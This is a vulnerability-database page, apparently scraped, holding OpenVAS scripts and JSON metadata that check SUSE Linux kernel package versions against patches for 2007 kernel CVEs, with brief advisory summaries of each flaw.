For more information, please visit the referenced security
advisories.
More details may also be found by searching for keyword
5020541 within the SuSE Enterprise Server 9 patch
database at http://download.novell.com/patch/finder/
# OpenVAS Vulnerability Test
# $Id: sles9p5020541.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Security update for Linux kernel
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
kernel-um
kernel-syms
kernel-debug
kernel-default
kernel-smp
kernel-source
kernel-bigsmp
um-host-kernel
um-host-install-initrd
For more information, please visit the referenced security
advisories.
More details may also be found by searching for keyword
5020541 within the SuSE Enterprise Server 9 patch
database at http://download.novell.com/patch/finder/";
tag_solution = "Please install the updates provided by SuSE.";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.65059");
script_version("$Revision: 9350 $");
script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");
script_tag(name:"creation_date", value:"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)");
script_cve_id("CVE-2007-2876", "CVE-2007-3105", "CVE-2007-2525", "CVE-2007-3848", "CVE-2007-4573", "CVE-2007-4571");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_name("SLES9: Security update for Linux kernel");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"kernel-um", rpm:"kernel-um~2.6.5~7.287.3", rls:"SLES9.0")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:136141256231065059", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES9: Security update for Linux kernel", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-um\n kernel-syms\n kernel-debug\n kernel-default\n kernel-smp\n kernel-source\n kernel-bigsmp\n um-host-kernel\n um-host-install-initrd\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020541 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "published": "2009-10-10T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065059", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2007-4573", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3105", "CVE-2007-4571", "CVE-2007-2525"], "lastseen": "2018-04-06T11:37:16", "viewCount": 2, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-04-06T11:37:16", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:861149", "OPENVAS:840139", "OPENVAS:1361412562310830336", "OPENVAS:58528", "OPENVAS:65059", "OPENVAS:850097", "OPENVAS:861192", "OPENVAS:830336", "OPENVAS:850094", "OPENVAS:60439"]}, {"type": "cve", "idList": ["CVE-2007-3105", "CVE-2007-4571", "CVE-2007-2525", "CVE-2007-2876", "CVE-2007-4573", "CVE-2007-3848"]}, {"type": "nessus", "idList": ["SUSE_KERNEL-4471.NASL", "SUSE_KERNEL-4472.NASL", "SUSE_KERNEL-4473.NASL", "MANDRAKE_MDKSA-2007-195.NASL", "SUSE_KERNEL-4185.NASL", "SUSE_KERNEL-4193.NASL", "SUSE_KERNEL-4503.NASL", "SUSE_KERNEL-4487.NASL", "SUSE_KERNEL-4186.NASL", "UBUNTU_USN-510-1.NASL"]}, {"type": "f5", "idList": ["SOL8920", "F5:K8171", "SOL8171"]}, {"type": "suse", "idList": ["SUSE-SA:2007:053", "SUSE-SA:2007:051"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0939", "ELSA-2007-0937", "ELSA-2007-0936"]}, {"type": "ubuntu", "idList": ["USN-508-1", "USN-509-1", "USN-510-1"]}, {"type": "centos", "idList": ["CESA-2007:0936", "CESA-2007:0937", "CESA-2007:0939", "CESA-2007:0938"]}, {"type": "redhat", "idList": ["RHSA-2007:0937", "RHSA-2007:0939", "RHSA-2007:0938", "RHSA-2007:0936"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1356-1:BF694", "DEBIAN:DSA-1505-1:DAD99"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18082", "SECURITYVULNS:VULN:8184", "SECURITYVULNS:DOC:17828", "SECURITYVULNS:VULN:7954"]}, {"type": "fedora", "idList": ["FEDORA:L98DOFCE010426", "FEDORA:L7O5I5DM030334", "FEDORA:L8SLO9TI029024", "FEDORA:L84LCTQV029218", "FEDORA:L8PFIPEW010706"]}, {"type": "seebug", "idList": ["SSV:2251", "SSV:83980"]}, {"type": "osvdb", "idList": ["OSVDB:37288", "OSVDB:39234", "OSVDB:37112", "OSVDB:35929", "OSVDB:37287", "OSVDB:37289"]}, {"type": "exploitdb", "idList": ["EDB-ID:30605", "EDB-ID:30604"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:41E42B7C4DE7094C90B621FA0E017848"]}], "modified": "2018-04-06T11:37:16", "rev": 2}, "vulnersScore": 7.3}, "pluginID": "136141256231065059", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020541.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-um\n kernel-syms\n kernel-debug\n kernel-default\n kernel-smp\n kernel-source\n kernel-bigsmp\n um-host-kernel\n um-host-install-initrd\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020541 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65059\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-2525\", \"CVE-2007-3848\", \"CVE-2007-4573\", \"CVE-2007-4571\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.5~7.287.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks"}
{"openvas": [{"lastseen": "2017-07-26T08:55:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3105", "CVE-2007-4571", "CVE-2007-2525"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-um\n kernel-syms\n kernel-debug\n kernel-default\n kernel-smp\n kernel-source\n kernel-bigsmp\n um-host-kernel\n um-host-install-initrd\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020541 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65059", "href": "http://plugins.openvas.org/nasl.php?oid=65059", "type": "openvas", "title": "SLES9: Security update for Linux kernel", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020541.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-um\n kernel-syms\n kernel-debug\n kernel-default\n kernel-smp\n kernel-source\n kernel-bigsmp\n um-host-kernel\n um-host-install-initrd\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020541 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65059);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-2525\", \"CVE-2007-3848\", \"CVE-2007-4573\", \"CVE-2007-4571\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.5~7.287.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T11:20:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-2876", "CVE-2007-3848", "CVE-2007-0773", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2006-6106", "CVE-2006-4145", "CVE-2007-2875", "CVE-2007-4571", "CVE-2007-2525"], "description": "Check for the Version of kernel", "modified": "2017-12-08T00:00:00", "published": "2009-01-28T00:00:00", "id": "OPENVAS:850097", "href": "http://plugins.openvas.org/nasl.php?oid=850097", "type": "openvas", "title": "SuSE Update for kernel SUSE-SA:2007:053", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2007_053.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for kernel SUSE-SA:2007:053\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel has been updated to fix various security problems.\n\n Please note that some of the issues below might have been fixed\n previously for other distributions by updates already and were\n issued separate advisories. Only CVE-2007-4571 are\n completely new issues.\n\n Updates for SLES 10, SUSE Linux 10.0, 10.1 and openSUSE 10.2, 10.3\n were released on Wednesday. Updates for SUSE Linux Enterprise Server 9\n were released Thursday (yesterday), updates for SUSE Linux Enterprise\n Server 8 were released Friday (today).\n\n - CVE-2007-4573: It was possible for local user to become root by\n exploitable a bug in the IA32 system call emulation. This problem\n affects the x86_64 platform only, on all distributions.\n\n - CVE-2007-4571: An information disclosure vulnerability in the ALSA\n driver can be exploited by local users to read sensitive data from\n the kernel memory. This affects system with ALSA drivers loaded.\n\n - CVE-2007-3105: Stack-based buffer overflow in the random number\n generator (RNG) implementation in the Linux kernel before 2.6.22\n might allow local root users to cause a denial of service or gain\n privileges by setting the default wake-up threshold to a value\n greater than the output pool size, which triggers writing random\n numbers to the stack by the pool transfer function involving "bound\n check ordering". Since this value can only be changed by a root user,\n exploitability is low.\n\n - CVE-2007-2525: A memory leak in the PPPoE driver can be abused by\n local users to cause a denial-of-service condition.\n\n - CVE-2007-3851: On machines with a Intel i965 based graphics card\n local users with access to the direct rendering device node could\n overwrite memory on the machine and so gain root privileges.\n\n - CVE-2007-2875: An integer underflow in the cpuset_tasks_read function\n allows local users to obtain portions of kernel memory when the\n cpuset filesystem is mounted.\n\n - CVE-2007-3107: The signal handling in the Linux kernel, when run on\n PowerPC systems using HTX, allows local users to cause a denial of\n service via unspecified vectors involving floating point corruption\n and concurrency.\n\n - CVE-2007-3513: The lcd_write function in drivers/usb/misc/usblcd.c\n in the Linux kernel did not limit the amount o ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_impact = \"local privilege escalation\";\ntag_affected = \"kernel on SUSE LINUX 10.1, openSUSE 10.2, openSUSE 10.3, SuSE Linux Enterprise Server 8, SUSE SLES 9, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SUSE Linux Enterprise Desktop 10 SP1, SLE SDK 10 SP1, SUSE Linux Enterprise Server 10 SP1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850097);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"SUSE-SA\", value: \"2007-053\");\n script_cve_id(\"CVE-2006-4145\", \"CVE-2006-6106\", \"CVE-2007-0773\", \"CVE-2007-2525\", \"CVE-2007-2875\", \"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-3107\", \"CVE-2007-3513\", \"CVE-2007-3848\", \"CVE-2007-3851\", \"CVE-2007-4571\", \"CVE-2007-4573\");\n script_name( \"SuSE Update for kernel SUSE-SA:2007:053\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.9~0.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.9~0.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.9~0.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.9~0.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.9~0.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.9~0.4\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.18.8~0.7\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESSr8\")\n{\n\n if ((res = isrpmvuln(pkg:\"k_deflt\", rpm:\"k_deflt~2.4.21~325\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"k_numa\", rpm:\"k_numa~2.4.21~325\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"k_smp\", rpm:\"k_smp~2.4.21~325\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.4.21~325\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDK10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp-debuginfo\", rpm:\"kernel-bigsmp-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenpae-debuginfo\", rpm:\"kernel-xenpae-debuginfo~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.53~0.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"OES\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-update-tool\", rpm:\"kernel-update-tool~0.9~20.10.4\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-um\", rpm:\"kernel-um~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-install-initrd\", rpm:\"um-host-install-initrd~1.0~48.24.1\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"um-host-kernel\", rpm:\"um-host-kernel~2.6.5~7.287.3\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"km_nss\", rpm:\"km_nss~4.9.2226~0.1\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES9\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-update-tool\", rpm:\"kernel-update-tool~0.9~20.10.4\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.5~7.287.3\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-bigsmp\", 